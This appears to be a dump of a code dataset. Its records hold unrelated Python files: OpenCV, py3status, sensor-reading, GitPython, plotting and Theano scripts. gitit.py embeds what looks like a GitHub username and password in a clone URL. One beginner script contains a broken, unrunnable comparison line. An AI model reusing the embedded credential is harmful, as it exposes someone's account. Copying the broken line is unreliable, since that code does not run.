print(\"找打元素输入框\")","sub_path":"UIAutoTest-master/yoyotest/Android/Page/Page_iTest.py","file_name":"Page_iTest.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462069079","text":"import cv2\n\nimg = cv2.imread(\"1.jpeg\", 0)\n\nret,thr = cv2.threshold(img, 220, 255, cv2.THRESH_BINARY)\ncv2.imshow(\"original\", img)\ncv2.imshow(\"Thresholded\", thr)\ncv2.imwrite(\"thresholded.jpeg\", thr)\nif cv2.waitKey(0) == 27:\n cv2.destroyAllWindows()\n","sub_path":"adaptthreshold.py","file_name":"adaptthreshold.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"164415787","text":"# -*- coding: utf-8 -*-\nfrom time import time\nimport subprocess\nimport re\nimport shlex\n\n\"\"\"\n\tRequires: amixer.\n\n\tCopied from https://github.com/viggee/configi3\n\tModified by tethik.\n\"\"\"\n\nclass Py3status:\n\tdef volume(self, i3s_output_list, i3s_config):\n\t\tdata = subprocess.check_output(['amixer', '-M', '-c', '0', 'sget', 'Master']).decode('utf-8')\n\t\tvolumeobj = re.search(r\"\\[.*%\\]\", data, re.M)\n\t\tvolume = int(volumeobj.group()[1:-2])\n\n\t\tstatus = re.search(r\"\\[on\\]\", data, re.M)\n\t\tif status == None:\n\t\t\tvolumeicon = \" \"\n\t\telse:\n\t\t\tvolumeicon = \" \"\n\t\tvolumestr = volumeicon + \"{:3.0f}\".format(volume) + \"%\"\n\n\t\tresponse = {'full_text': '', 'name': 'volume'}\n\t\tresponse['color'] = \"#268bd2\"\n\t\tresponse['full_text'] = volumestr\n\t\tresponse['cached_until'] = time() + 60\n\t\treturn (0, response)\n\n\tdef on_click(self, i3s_output_list, i3s_config, event):\n\t\tif event['button'] == 1:\n\t\t\tsubprocess.Popen(shlex.split(\"amixer -q set Master toggle\"))\n\t\tif event['button'] == 4:\n\t\t\tsubprocess.Popen(shlex.split(\"amixer -q set Master 5%+ unmute\"))\n\t\tif event['button'] == 5:\n\t\t\tsubprocess.Popen(shlex.split(\"amixer -q set Master 5%- unmute\"))\n\t\tsubprocess.Popen([\"killall\", \"-USR1\", \"py3status\"])\n\nif __name__ == \"__main__\":\n\t\"\"\"\n\tTest this module by calling it directly.\n\t\"\"\"\n\tfrom time import sleep\n\tx = Py3status()\n\tx.on_click(None, [], {'button':1})\n\twhile True:\n\t print(x.volume([], {}))\n\t sleep(1)\n","sub_path":"py3status/modules/interactive_volume.py","file_name":"interactive_volume.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418388391","text":"s1=input(\"Please tell me your name: \")\ns2=int(input(\"Please tell me your age: \"))\ns3=\"Hello, {1}. Python is {0} years older than you\"\ns4=\"Hello, {1}. Python is {0} years younger than you\"\ns5=\"Hello, {0}. Python is as old as you\"\na=25\nif int(s2)int(a):\n print(s4.format(int(int(s2)-a),str(s1)))\nif int(s2)==int(a):\n print(s5.format(str(s1)))\n","sub_path":"LEVEL1:Hello,_Friend2.py","file_name":"LEVEL1:Hello,_Friend2.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322492437","text":"import sys\nsys.stdin = open('보급로.txt','r')\ndef pri(board):\n for b in board:\n print(b)\n\nfrom collections import deque\n\nT = int(input())\nfor tc in range(1,T+1):\n N = int(input())\n board = [list(map(int,list(input()))) for _ in range(N)]\n di = [(-1,0),(1,0),(0,1),(0,-1)]\n D = [[0xfffffffff] * N for _ in range(N)]\n Q = deque()\n Q.append((0,0))\n D[0][0] = 0\n while Q:\n y,x = Q.popleft()\n for dy,dx in di:\n ny = y + dy\n nx = x + dx\n if 0 <= ny < N and 0 <= nx < N:\n if D[ny][nx] > D[y][x] + board[ny][nx]:\n D[ny][nx] = D[y][x] + board[ny][nx]\n Q.append((ny,nx))\n print('#{} {}'.format(tc,D[N-1][N-1]))\n \n \n\n","sub_path":"1109/보급로.py","file_name":"보급로.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"105421163","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom src.datasets import DrawDataset, get_train_val_samples\r\nfrom src.transforms import ImageTransform, DrawTransform\r\nimport src.config as config\r\n\r\nimage_size = 256\r\nscale_size = 128\r\nimage_pad = 3\r\nshake = [0, 3, 5, 7]\r\nimage_line_width = 3\r\ntrain_epoch_size = 10_000\r\nnum = 4\r\n\r\nif __name__ == \"__main__\":\r\n _, samples = get_train_val_samples('./data/val_key_ids_003.json', None)\r\n n = len(samples[0])\r\n trns = ImageTransform(True, scale_size)\r\n fig = plt.figure()\r\n for j in range(len(shake)):\r\n draw_transform = DrawTransform(image_size, image_pad, image_line_width, False, shake[j])\r\n dataset = DrawDataset(samples, draw_transform, size=train_epoch_size, image_transform=trns)\r\n loader = DataLoader(dataset, batch_size=n, num_workers=0, shuffle=False)\r\n for img, trg in loader:\r\n c = np.zeros(num)\r\n for i in range(n):\r\n label = trg[i].item()\r\n if (c[label] > 0):\r\n continue\r\n c[label] = 1\r\n ax = fig.add_subplot(len(shake), num, j*num+label+1)\r\n img_i = 1 - img[0][i, :, :, :].numpy().transpose((1,2,0))\r\n if (shake[j]==0):\r\n s = ' no shake'\r\n else:\r\n s = ' shake=' + str(shake[j])\r\n ax.set_title(config.IDX_TO_CLASS[label] + s)\r\n ax.imshow(img_i)\r\n ax.set_axis_off()\r\n if np.prod(c) > 0:\r\n break\r\n plt.show()\r\n","sub_path":"argus-quick-draw-master/comp_shake.py","file_name":"comp_shake.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"71763891","text":"\nfrom trade.util import *\nimport easytrader\n\nDB_NAME = \"seek_alpha\"\nCOLLECTION = \"xueqiu\"\ndb = MongoDB(DB_NAME)\npath = os.getcwd()\nresult_file = open(\"Result.csv\", \"w\")\nfor root, dirs, files in os.walk(path + \"\\logs\\seek_alpha\"):\n for name in files:\n log_name = os.path.join(root, name)\n log = open(log_name)\n for line in log:\n report = {}\n tokens = line.split()\n if len(tokens) == 7:\n time = tokens[0]\n code = tokens[3].split(\":\")[0]\n alpha = get_four_five(tokens[4].split(\":\")[1], 5)\n beta = get_four_five(tokens[5].split(\":\")[1], 5)\n sharp = get_four_five(tokens[6].split(\":\")[1], 5)\n report[\"time\"] = time\n report[\"code\"] = code\n report[\"alpha\"] = alpha\n report[\"beta\"] = beta\n report[\"sharp\"] = sharp\n db.insert_doc(COLLECTION, report)\n# print 1\nfactor_dict = {}\nfor i in db.db[COLLECTION].find():\n grade = i[\"alpha\"] + i[\"sharp\"]\n factor_dict[i[\"code\"]] = grade if abs(grade) < 100 else 0\n # if i[\"alpha\"] > 1 and i[\"sharp\"] > 1:\n # result_file.write(i[\"code\"] + \"\\t\" + str(i[\"alpha\"]) + \"\\t\" + str(i[\"sharp\"]) + \"\\n\")\nsorted_list = sorted(factor_dict.iteritems(), key=lambda d: d[1], reverse = True)[:100]\nfor i in sorted_list:\n result_file.write(str(i) + \"\\n\")\nresult_file.close()\n","sub_path":"test/alpha_db.py","file_name":"alpha_db.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"309530984","text":"#US Natural Gas Production\nimport json\nimport requests\nimport os\n\nurl_eia_production = os.environ.get('EIA_API_NG_PROD')\nurl_database = os.environ.get('LINK_NG_PROD')\ntoken = os.environ.get('PA_API_TOKEN')\n\n#Retrieve Natural Gas production data from EIA website\nurl = url_eia_production\nsource_NatGas = requests.get(url)\n\n#Format data into useable json format\ndata_NatGas = json.loads(source_NatGas.text)\n\n#Update database if needed\n\n#format the date\nyear = data_NatGas['series'][0]['data'][0][0][:4]\nmonth = data_NatGas['series'][0]['data'][0][0][4:6]\ncurrent_date = year + '-' + month\n\n#Get the last datapoint from database\nurl = url_database\ndata = requests.get(url)\nproduction = json.loads(data.text)\nlast_date = production[-1]['date']\n\n#Update the database if current_date != last_date\nif current_date == last_date:\n print('current_date:', current_date, 'is equal to last_date:', last_date, '- Database not updated')\n\nelse:\n headers = {'Authorization': token}\n\n payload = {\n 'date': current_date,\n 'ng_production': data_NatGas['series'][0]['data'][0][1],\n }\n\n resp = requests.post(url, headers=headers, data=payload)\n print(resp)\n\n\n\n","sub_path":"EIA_Production_NG.py","file_name":"EIA_Production_NG.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"36015073","text":"n = int(input(\"Enter Number to calculate sum & average\"))\r\n\r\n\r\n\r\nsum = 0\r\n\r\nfor num in range(0, n + 1, 1):\r\n sum = sum + num\r\n\r\naverage = sum / n\r\n\r\nprint(\"SUM of\", n, \"numbers is: \", sum)\r\nprint(\"Average of\", n, \"natural number is: \", average)","sub_path":"Task 3/1).py","file_name":"1).py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546003746","text":"class Solution:\n def plusOne(self, digits: 'List[int]') -> 'List[int]':\n if (len(digits) == 0):\n return digits\n \n digits[-1] += 1\n if (digits[-1] == 10):\n digits[-1] = 0\n \n for i in range(len(digits) - 2, -1, -1): \n if (digits[i + 1] == 0):\n digits[i] += 1\n if (digits[i] == 10):\n digits[i] = 0\n else:\n break\n \n if (digits[0] == 0):\n digits.insert(0, 1)\n \n return digits \n\ndef main():\n\n digits = [9, 9]\n\n sol = Solution() \n result = sol.plusOne(digits)\n\n print(result, end ='')\n\n return\n\n\nif __name__ == '__main__':\n main()","sub_path":"#66_plus_one/python/_66_plus_one_py.py","file_name":"_66_plus_one_py.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562414774","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtGui import QPixmap\nfrom UI.start import Ui_MainWindow\nfrom UI.view1 import Ui_Form as view1\nfrom UI.read_result import Ui_read_result\nimport product_registration\nfrom BC_video_copy import csv2dict\nimport numpy as np\nimport cv2\nimport csv\nfrom play_sound import SoundPlayer #階層に注意\nfrom time import sleep\nfrom pyzbar.pyzbar import decode\nfrom PIL import Image\n\n\nclass StartWindow(QtWidgets.QMainWindow):\n def __init__(self,parent=None):\n super(StartWindow, self).__init__(parent)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n def keyPressEvent(self, e):\n # Enterを押すとバーコード読み取り画面が現れる\n #print(e)\n #print(e.key())\n if e.key() == 16777220:\n view_1.show()\n self.hide()\n elif e.key() == Qt.Key_Escape:\n product_registration.add_main()\n #self.close()\n\nclass View1(QtWidgets.QWidget):\n def __init__(self,parent=None):\n super(View1, self).__init__(parent)\n self.ui = view1()\n self.ui.setupUi(self)\n self.table_items =[]\n def keyPressEvent(self, e):\n # エスケープキーを押すと画面が閉じる\n if e.key() == 16777220:\n self.register_main()\n elif e.key() == Qt.Key_Escape:\n self.close()\n\n def register_main(self):\n data = read_BC()\n if len(data) == 0:\n print(\"バーコードが読み取れていない!!!!\") # 例外処理について後で考える!\n bc_num = data[0][0].decode('utf-8', 'ignore') if data[0][0].decode('utf-8', 'ignore') in dict_names.keys() else \"その他\"\n self.table_items.append(bc_num)\n name_c, price_c = dict_names[bc_num], dict_prices[bc_num]\n print(name_c, price_c)\n read_result.draw_result(name_c, price_c)\n read_result.show()\n self.hide()\n\n\n\n\nclass ReadResult(QtWidgets.QMainWindow):\n def __init__(self,parent=None):\n super(ReadResult, self).__init__(parent)\n self.ui = Ui_read_result()\n self.ui.setupUi(self)\n def keyPressEvent(self, e):\n # Enterを押すとバーコード読み取り画面が現れる\n if e.key() == 16777220:\n view_1.show()\n self.hide()\n\n def draw_result(self, name, price):\n self.ui.label.setText(name)\n self.ui.label_2.setText(str(price)+\"RWF\")\n\n\n\ndef read_BC(window=None, camera=0):\n # VideoCaptureのインスタンスを作成する。\n # 引数でカメラを選べれる。\n cap = cv2.VideoCapture(camera)\n #cap.set(cv2.CAP_PROP_FRAME_WIDTH, 50) # カメラ画像の横幅を250に設定\n #cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 50) # カメラ画像の縦幅を250に設定\n\n if cap.isOpened() is False:\n print(\"can not open camera\")\n sys.exit()\n\n while True:\n # VideoCaptureから1フレーム読み込む\n ret, frame = cap.read()\n\n # バーコードの読取り\n data = decode(frame)\n\n #ウィンドウの中でカメラの映像を表示したい\n #img_res = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n #img_res = cv2.resize(img_res, (250, 250))\n #qt_img = create_QPixmap(img_res)\n #window.ui.label_setPix.setPixmap(qt_img)\n #cv2.imshow('frame', frame)\n if len(data) != 0:\n #読み取れたらwhileから抜ける\n break\n\n # キー入力を1ms待って、キーが'q'だったらBreakする\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\n return data\n\n\n\nif __name__ == '__main__':\n #商品の辞書をロードする\n dict_names, dict_prices = csv2dict('names_prices/BC_info.csv')\n app = QtWidgets.QApplication(sys.argv)\n start_window = StartWindow()\n view_1 = View1()\n read_result = ReadResult()\n start_window.show()\n sys.exit(app.exec_())","sub_path":"Self_cash_register_BC/old/start_ui.py","file_name":"start_ui.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"521874726","text":"import numpy as np\r\nimport os\r\nfrom glob import glob\r\nimport json\r\nimport os.path as osp\r\nimport sys\r\nfrom PIL import Image\r\n\r\nclass roadDamageDataset():\r\n\r\n def __init__(self, imagesFolderPath, labelsFolderPath):\r\n self.images_root = imagesFolderPath\r\n self.labels_root = labelsFolderPath\r\n \r\n def load_data(self):\r\n img=[]\r\n lbl=[]\r\n labelsFolder=self.labels_root\r\n imagesFolder = self.images_root\r\n listOfFiles = os.listdir(labelsFolder)\r\n \r\n for l in listOfFiles:\r\n outputFolder = labelsFolder + \"/\" + l\r\n inputFolder = imagesFolder + \"/\" + l\r\n if (os.path.isdir(outputFolder)):\r\n for label_file in glob(osp.join(outputFolder, '*.png')):\r\n with open(label_file) as f:\r\n base = osp.splitext(osp.basename(label_file))[0]\r\n img_file = osp.join(inputFolder, base + '.png')\r\n if(os.path.isfile(img_file)):\r\n lbl.append(np.asarray(Image.open(f.name)))\r\n img.append(np.asarray(Image.open(img_file)))\r\n \r\n return np.asarray(img),np.asarray(lbl)\r\n ","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"344663547","text":"\"\"\"\"Converts distances between unit types\"\"\"\n\n# 1. Define\n\n\ndef prompt_for_data():\n \"\"\" take in user strings and output usable variables \"\"\"\n starting_unit = input('Hello. I am a program that converts distances. What is' +\n 'your starting unit of measurement?' +\n ' Please input; mi, km, ft or m. ')\n distance_in_starting_unit = float(input('What is your distance amount? '))\n output_unit = input('What is your end unit, please input; mi, km, ft or m ? ')\n user_input_list = []\n user_input_list += [starting_unit, distance_in_starting_unit, output_unit]\n return user_input_list\n\ndef convert_to_meters(distance_information):\n \"\"\"\"pull the starting unit from the list and outputs the correct conversion factor from starting unit to meters\"\"\"\n MI_TO_M = 1609.34\n KM_TO_M = 1000\n FT_TO_M = 0.3048\n starting_unit = distance_information[0]\n distance_in_starting_unit = distance_information[1]\n if starting_unit == 'mi':\n distance_in_converted_unit = MI_TO_M * distance_in_starting_unit\n elif starting_unit == 'km':\n distance_in_converted_unit = KM_TO_M * distance_in_starting_unit\n elif starting_unit == 'ft':\n distance_in_converted_unit = FT_TO_M * distance_in_starting_unit\n else:\n distance_in_converted_unit = distance_in_starting_unit\n return distance_in_converted_unit\n\ndef convert_to_output_distance(distance_information, distance_in_meters):\n MI_TO_M = 1609.34\n KM_TO_M = 1000\n FT_TO_M = 0.3048\n output_unit = distance_information[2]\n if output_unit == 'mi':\n distance_in_output_unit = distance_in_meters / float(MI_TO_M)\n elif output_unit == 'km':\n distance_in_output_unit = distance_in_meters / KM_TO_M\n elif output_unit == 'ft':\n distance_in_output_unit = distance_in_meters / FT_TO_M\n else:\n distance_in_output_unit = distance_in_meters\n return distance_in_output_unit\n\n# 2. Main\n\n\ndef main():\n\n distance_information = prompt_for_data()\n distance_in_meters = convert_to_meters(distance_information)\n output_distance = convert_to_output_distance(distance_information, distance_in_meters)\n output = str(output_distance)\n print('Output: ' + str(output))\n return output\n\nmain()\n","sub_path":"practice/distance-converter.py","file_name":"distance-converter.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"214453473","text":"# -*- coding:utf-8 -*-\nimport os\nimport git\n\nfrom utils.file import remove_dir, mk_dirs\nimport shutil\nfrom utils.mylogger import getlogger\n\nlog = getlogger(__name__)\n\n\ndef remote_clone(app, url):\n \"\"\"\n git.colone_from\n return True/False and info\n \"\"\"\n\n newdir = url.split('/')[-1].split('.')[0]\n to_path = os.path.join(app.config['AUTO_TEMP'], newdir)\n remove_dir(to_path) if os.path.exists(to_path) else None\n mk_dirs(to_path)\n\n try:\n repo = git.Repo.clone_from(url, to_path)\n except git.exc.GitError as e:\n log.error(\"Git clone 从 {} 到目录 {} 异常:{}\".format(url, to_path, e))\n log.info(\"{}\".format(e))\n return (False, \"{}\".format(e))\n\n log.info(\"Clone 从 {} 到路径:{} 成功\".format(url, to_path))\n\n projectfile = os.path.join(to_path, 'platforminterface/project.conf')\n log.info(\"读取 Project file: {}\".format(projectfile))\n if os.path.exists(projectfile):\n with open(projectfile, 'r') as f:\n for l in f:\n if l.startswith('#'):\n continue\n if len(l.strip()) == 0:\n continue\n splits = l.strip().split('|')\n if len(splits) != 4:\n log.error(\"错误的 project.conf 行 \" + l)\n return (False, \"错误的 project.conf 行 \" + l)\n (projectname, owner, users, cron) = splits\n project_path = os.path.join(\n app.config['AUTO_HOME'], 'workspace', owner, projectname)\n if os.path.exists(project_path):\n msg = '目标目录存在:{}'.format(project_path)\n log.error(msg)\n return (False, msg)\n log.info(\"复制文件从 {} 到 {} \".format(to_path, project_path))\n try:\n shutil.copytree(to_path, project_path)\n except Exception as e:\n return (False, \"{}\".format(e))\n else:\n msg = \"Load Project Fail: 找不到 project.conf:{} \".format(projectfile)\n log.error(msg)\n return (False, msg)\n\n return (True, project_path) if repo else (False, \"Git clone fail!\")\n\n\ndef remote_clone_BAK(url, localpath):\n \"\"\"\n git.colone_from\n return True/False and info\n \"\"\"\n\n newdir = url.split('/')[-1].split('.')[0]\n to_path = os.path.join(localpath, newdir)\n if os.path.exists(to_path):\n errinfo = \"路径 {} 已存在,请先删除!\".format(newdir)\n log.error(\"remote_clone:\"+to_path+\" 目录存在!\")\n return (False, errinfo)\n\n os.mkdir(to_path)\n\n try:\n repo = git.Repo.clone_from(url, to_path)\n except git.exc.GitError as e:\n log.error(\"Git clone 从 {} 到目录 {} 异常:{}\".format(url, localpath, e))\n log.info(\"{}\".format(e))\n return (False, \"{}\".format(e))\n\n return (True, to_path) if repo else (False, \"fail\")\n\n\ndef is_gitdir(dir):\n\n try:\n repo = git.Repo(dir)\n except git.exc.InvalidGitRepositoryError:\n return False\n\n return True\n\n\ndef commit(dir):\n \"\"\"\n git.commit\n \"\"\"\n try:\n repo = git.Repo(dir)\n except git.exc.InvalidGitRepositoryError as e:\n log.error(\"目录 {} 不是一个git目录!{}\".format(dir, e))\n log.info(\"{}\".format(e))\n return False, \"{}\".format(e)\n\n for f in repo.untracked_files:\n repo.index.add([f])\n repo.index.commit(\"Add file:\"+f)\n try:\n repo.commit(\"master\")\n except Exception as e:\n log.error(\"commit {} 失败.{}\".format(dir, e))\n log.info(\"{}\".format(e))\n return False, \"{}\".format(e)\n\n return True\n\n\ndef push(dir):\n\n log.info(\"Push前先commit ...\")\n\n ok, info = commit(dir)\n if not ok:\n return False, info\n\n remote = git.Repo(dir).remote()\n\n try:\n remote.push(\"origin\")\n except Exception as e:\n log.error(\"Push dir {} failed:{}\".format(dir, e))\n log.info(\"{}\".format(e))\n return False, \"{}\".format(e)\n\n return True, \"success\"\n\n\nif __name__ == '__main__':\n\n url1 = \"https://github.com/mawentao119/robotframework-metrics.git\"\n url = \"https://mawentao119:mwt\\@Github1@github.com/mawentao119/robotframework-metrics.git\"\n\n path = \"temp1234\"\n remove_dir(path) if os.path.exists(path) else None\n os.mkdir(path)\n\n remote_clone(url1, path)\n open(\"temp1234/robotframework-metrics/123.txt\", 'w').close()\n commit(path+'/'+\"robotframework-metrics\")\n\n print(is_gitdir(\"temp1234\"))\n remove_dir(path)\n\n #from utils.dbclass import TestDB\n #myDB = TestDB('/Users/tester/PycharmProjects/uniRobotDev/.beats')\n","sub_path":"utils/gitit.py","file_name":"gitit.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583339188","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom math import *\nx= np.arange(-pi,pi,0.001)\nx=list(x)\ny=[]\nfor i in x:\n y.append(sin(i))\n\nplt.plot(x,y) \nplt.show()","sub_path":"sine_wave.py","file_name":"sine_wave.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"301700625","text":"f = open(r'..\\editor.py', mode='r', encoding='utf8')\r\ncontent = f.readlines()\r\nf.close()\r\n\r\nclass Class:\r\n def __init__(self, name):\r\n self.name = name\r\n self.methods = {}\r\n\r\nclass Method:\r\n def __init__(self, name):\r\n self.name = name\r\n self.calls = []\r\n\r\nlast_class = None\r\nclasses = {}\r\nmethods = {}\r\n\r\nfor raw in content:\r\n line = raw.strip()\r\n if line.startswith('class') and line.endswith(':'):\r\n name = line[6:-1]\r\n classes[name] = Class(name)\r\n last_class = name\r\n elif line.startswith('def') and line.endswith(':'):\r\n name = line[4:-1]\r\n if raw.startswith(' ') and last_class is not None:\r\n classes[last_class].methods[name] = Method(name)\r\n else:\r\n methods[name] = Method(name)\r\n\r\n#for line in content:\r\n# if line.index('(') != -1:\r\n# print(line)\r\n\r\nprint('Classes:\\n')\r\n\r\nfor cname in classes:\r\n c = classes[cname]\r\n print(' class', c.name, 'with', len(c.methods), 'methods.')\r\n for m in c.methods:\r\n print(' ', m)\r\n\r\nprint(f'\\nNumber of classes: {len(classes)}\\n')\r\n\r\nprint('Free Methods:\\n')\r\n\r\nfor m in methods:\r\n print(' ', m)\r\n\r\nprint(f'\\nNumber of free methods: {len(methods)}\\n')\r\n","sub_path":"teddypy/qa/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"128468911","text":"import matplotlib as mpl\nmpl.use('pgf')\nimport numpy as np\nimport scipy.constants as const\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom uncertainties import ufloat\nimport uncertainties.unumpy as unp\nfrom uncertainties.unumpy import (nominal_values as noms, std_devs as stds)\nmpl.rcParams.update({\n 'font.family': 'serif',\n 'text.usetex': True,\n 'pgf.rcfonts': False,\n 'pgf.texsystem': 'lualatex',\n 'pgf.preamble': r'\\usepackage{unicode-math}\\usepackage{siunitx}'\n})\n\nU6, I6 = np.genfromtxt('messwerte4.txt', unpack=True)\nI6A = I6/1000000000\nU6tat = U6 - 1000000*I6A #1MOhm Innenwiderstand\nI6log = np.log(I6A)\n\ne = const.e\nk = const.k\n\ndef f(x, a, b):\n return a*x+b\n\nparams, covariance = curve_fit(f, U6tat, I6log)\n\nerrors = np.sqrt(np.diag(covariance))\n\nprint('a =', params[0], '±', errors[0])\nprint('b =', params[1], '±', errors[1])\n\na = ufloat(params[0], errors[0])\n\nT = -e/(k*a)\n\nnp.savetxt(\"Parameter2.txt\", np.column_stack([params, errors]))\n\nprint('T =', noms(T), '±', stds(T))#in Kelvin\n\nx_plot = np.linspace(-0.05, 1)\n\nplt.plot(x_plot, f(x_plot, *params), 'b-', label='Fit', linewidth=1)\nplt.plot(U6tat, I6log, 'rx', label='Messwerte', linewidth=1)\nplt.xlabel(r'$ln \\left( \\frac{U}{\\si{\\volt}} \\right)$')\nplt.ylabel(r'$ln \\left( \\frac{I}{\\si{\\nano\\ampere}} \\right)$')\nplt.xlim(-0.05, 1)\nplt.grid()\nplt.legend(loc=\"best\")\nplt.tight_layout()\nplt.savefig(\"Plot3.pdf\")\n","sub_path":"V504_Thermische Elektronenemission/auswertung3.py","file_name":"auswertung3.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"273820143","text":"import os\nimport time\n\nimport serial\n\n#physicalPort = 'COM4'\nphysicalPort = \"/dev/ttyUSB0\"\n\nserialPort = serial.Serial(physicalPort) # open serial port\n\nwhile True:\n # Check if we have enough data to read a payload\n if serialPort.in_waiting >= 32:\n # Check that we are reading the payload from the correct place (i.e. the start bits)\n if ord(serialPort.read()) == 0x42 and ord(serialPort.read()) == 0x4d:\n\n # Read the remaining payload data\n data = serialPort.read(30)\n\n # Extract the byte data by summing the bit shifted high byte with the low byte\n # Use ordinals in python to get the byte value rather than the char value\n frameLength = data[1] + (data[0] << 8)\n # Standard particulate values in ug/m3\n concPM1_0_CF1 = data[3] + (data[2] << 8)\n concPM2_5_CF1 = data[5] + (data[4] << 8)\n concPM10_0_CF1 = data[7] + (data[6] << 8)\n # Atmospheric particulate values in ug/m3\n concPM1_0_ATM = data[9] + (data[8] << 8)\n concPM2_5_ATM = data[11] + (data[10] << 8)\n concPM10_0_ATM = data[13] + (data[12] << 8)\n # Raw counts per 0.1l\n rawGt0_3um = data[15] + (data[14] << 8)\n rawGt0_5um = data[17] + (data[16] << 8)\n rawGt1_0um = data[19] + (data[18] << 8)\n rawGt2_5um = data[21] + (data[20] << 8)\n rawGt5_0um = data[23] + (data[22] << 8)\n rawGt10_0um = data[25] + (data[24] << 8)\n # Misc data\n version = data[26]\n errorCode = data[27]\n payloadChecksum = data[29] + (data[28] << 8)\n\n # Calculate the payload checksum (not including the payload checksum bytes)\n inputChecksum = 0x42 + 0x4d\n for x in range(0, 27):\n inputChecksum = inputChecksum + data[x]\n\n # Clear the screen before displaying the next set of data\n os.system('cls') # Set to 'cls' on Windows, 'clear' on linux\n print(\"PMS7003 Sensor Data:\")\n print(\"PM1.0 = \" + str(concPM1_0_CF1) + \" ug/m3\")\n print(\"PM2.5 = \" + str(concPM2_5_CF1) + \" ug/m3\")\n print(\"PM10 = \" + str(concPM10_0_CF1) + \" ug/m3\")\n print(\"PM1 Atmospheric concentration = \" + str(concPM1_0_ATM) + \" ug/m3\")\n print(\"PM2.5 Atmospheric concentration = \" + str(concPM2_5_ATM) + \" ug/m3\")\n print(\"PM10 Atmospheric concentration = \" + str(concPM10_0_ATM) + \" ug/m3\")\n print(\"Count: 0.3um = \" + str(rawGt0_3um) + \" per 0.1l\")\n print(\"Count: 0.5um = \" + str(rawGt0_5um) + \" per 0.1l\")\n print(\"Count: 1.0um = \" + str(rawGt1_0um) + \" per 0.1l\")\n print(\"Count: 2.5um = \" + str(rawGt2_5um) + \" per 0.1l\")\n print(\"Count: 5.0um = \" + str(rawGt5_0um) + \" per 0.1l\")\n print(\"Count: 10um = \" + str(rawGt10_0um) + \" per 0.1l\")\n print(\"Version = \" + str(version))\n print(\"Error Code = \" + str(errorCode))\n print(\"Frame length = \" + str(frameLength))\n if inputChecksum != payloadChecksum:\n print(\"Warning! Checksums don't match!\")\n print(\"Calculated Checksum = \" + str(inputChecksum))\n print(\"Payload checksum = \" + str(payloadChecksum))\n time.sleep(0.7) # Maximum recommended delay (as per data sheet)","sub_path":"dSensor.py","file_name":"dSensor.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346544710","text":"# -*- coding: utf-8 -*-\n\nimport theano\nimport theano.tensor as T\nimport numpy as np\nimport cPickle\nimport logging\nimport collections\nlogger = logging.getLogger(__name__)\n\nfrom theano import scan\nfrom theano.sandbox.rng_mrg import MRG_RandomStreams\nfrom theano.tensor.nnet.conv3d2d import *\nfrom collections import OrderedDict\n\nfrom model import *\nfrom utils import *\n\nimport operator\n\n# Theano speed-up\ntheano.config.scan.allow_gc = False\n#\n\ndef add_to_params(params, new_param):\n params.append(new_param)\n return new_param\n \nclass TitleModel(Model):\n def __init__(self, state, test_mode=False):\n Model.__init__(self)\n self.rng = numpy.random.RandomState(state['seed'])\n self.state = state\n self.__dict__.update(state)\n self.test_mode = test_mode\n self.name = 'TitleModel'\n self.active = eval(self.active)\n self.params = []\n self.init_params()\n\n self.x_data = T.imatrix('x_data')\n self.abs_in = T.imatrix('abs_in')\n self.abs_out = T.imatrix('abs_out')\n\n self.xmask = T.matrix('x_mask')\n self.ymask = T.matrix('y_mask')\n\n self.h_enc_basic = 